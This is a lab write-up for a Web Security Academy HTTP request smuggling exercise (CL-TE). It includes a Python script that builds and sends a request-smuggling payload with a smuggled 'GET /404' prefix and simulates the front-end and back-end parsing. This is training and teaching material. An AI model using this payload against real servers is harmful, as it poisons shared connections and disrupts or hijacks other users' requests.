Self Notes: Web Security Academy HTTP Request Smuggling Lab 4

Lab 4 can be found here.

For Lab 4 our task is to confirm a CL-TE vulnerability via differential responses. A Front-end/Back-end server pair is provided, and the Front-end server does not support chunked encoding. To solve the lab we need to smuggle a request to the Back-end server so that a subsequent request to the web root (/) results in a 404 Not Found response. Like Lab 3, the provided endpoint is a comment posting section, as below:


Response is:


We got a confirmation redirect. From the lab task we already know that the Front-end/Back-end pair is CL-TE, meaning the Front-end honours only the Content-Length header while the Back-end honours the Transfer-Encoding header, so no detection test is needed and we go straight to the following request:


The above request includes Transfer-Encoding: chunked so that the Back-end server reads the body as chunked and stops at the terminating zero-length chunk. The extra payload placed after that chunk is still inside the Content-Length the Front-end forwarded, but the Back-end does not treat it as part of this request: it is left unread on the Back-end connection and will be prepended to whatever request arrives next, poisoning it. Sending the above request results in a normal response:


As expected, a normal response is obtained from the server, although the Back-end connection has now been poisoned with our leftover payload. The next request to reach the Back-end over that connection is glued onto our smuggled GET /404 prefix and therefore gets a 404 Not Found response, as below:


A valid request to the already poisoned Back-end server yields a 404 Not Found response. If the leftover bytes happen to be consumed by someone else's request first, the normal response comes back instead; resend the attack request and try again. Lab 4 solved.
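The request and response screenshots are not reproduced here, so the following is an added example (my own code, not the lab's or the original post's) that builds a CL-TE attack request of the shape the lab calls for and replays how the two servers parse it. The hostname, the `/post/comment` path, the smuggled `GET /404` prefix and the victim request are all constructed for the example; the chunked-body parser and the Content-Length parser are simplified models of the two servers, not real server code.

```python
import socket
import ssl

# Constructed values for this example; the lab's real hostname is not reproduced here.
HOST = "example.lab.invalid"
# No trailing CRLF on purpose: the victim's request line fuses onto "Foo: x",
# so the victim's own headers become headers of the smuggled GET /404.
PREFIX = b"GET /404 HTTP/1.1\r\nFoo: x"
VICTIM = b"POST / HTTP/1.1\r\nHost: " + HOST.encode() + b"\r\nContent-Length: 0\r\n\r\n"


def build_clte_request(host: str, prefix: bytes, path: str = "/post/comment") -> bytes:
    """Attack request: Content-Length covers the whole body (what the front end honours),
    while the body is chunked (what the back end honours) and ends before `prefix`."""
    chunk = b"q=smuggling&x="
    body = b"%x\r\n%s\r\n0\r\n\r\n%s" % (len(chunk), chunk, prefix)
    head = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Transfer-Encoding: chunked\r\n\r\n"
    ).encode()
    return head + body


def _content_length(head: bytes) -> int:
    for line in head.split(b"\r\n"):
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            return int(value.strip())
    return 0


def front_end_split(stream: bytes):
    """CL-only front end: one request = headers + exactly Content-Length body bytes."""
    head, sep, rest = stream.partition(b"\r\n\r\n")
    n = _content_length(head)
    return head + sep + rest[:n], rest[n:]


def back_end_split(stream: bytes):
    """Chunked-aware back end: consumes chunks up to the zero-size chunk and the blank
    line after it; whatever follows stays on the socket for the *next* request."""
    head, sep, rest = stream.partition(b"\r\n\r\n")
    pos = 0
    while True:
        eol = rest.index(b"\r\n", pos)
        size = int(rest[pos:eol].split(b";")[0], 16)   # chunk-size, ignoring extensions
        pos = eol + 2
        if size == 0:
            while rest[pos:pos + 2] != b"\r\n":         # skip any trailer lines
                pos = rest.index(b"\r\n", pos) + 2
            pos += 2                                    # the blank line ending the body
            return head + sep + rest[:pos], rest[pos:]
        pos += size + 2                                 # chunk data plus its CRLF


def request_line(raw: bytes) -> bytes:
    return raw.split(b"\r\n", 1)[0]


def simulate(attack: bytes, victim: bytes):
    """Replay the shared back-end connection: returns the request line the back end
    answered normally, the bytes left on the socket, and the poisoned next request."""
    forwarded, unread = front_end_split(attack)
    assert unread == b"", "front end forwards the whole attack request"
    consumed, residue = back_end_split(forwarded)
    poisoned = residue + victim      # the victim's bytes land behind the leftover prefix
    return request_line(consumed), residue, poisoned


def send_raw(host: str, raw: bytes, port: int = 443) -> bytes:
    """Send the bytes verbatim over TLS; an HTTP library would rewrite the headers."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port)) as sock, \
            ctx.wrap_socket(sock, server_hostname=host) as tls:
        tls.sendall(raw)
        return tls.recv(65536)


if __name__ == "__main__":
    attack = build_clte_request(HOST, PREFIX)
    first, residue, poisoned = simulate(attack, VICTIM)
    print(first)                   # POST /post/comment HTTP/1.1  -> answered normally
    print(residue)                 # GET /404 HTTP/1.1\r\nFoo: x  -> left on the socket
    print(request_line(poisoned))  # GET /404 HTTP/1.1            -> next request gets 404
```

The simulation makes the differential visible without a target: the Front-end forwards all 49 body bytes, the Back-end stops after `0\r\n\r\n`, and the victim's `POST / HTTP/1.1` line ends up as the tail of the `Foo: x` header of the smuggled request, so the Back-end answers the next request as `GET /404`. Against the real lab the same bytes are sent from Burp Repeater (or `send_raw`) with automatic Content-Length updating turned off, followed quickly by the normal request, since both must reach the same Back-end connection.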
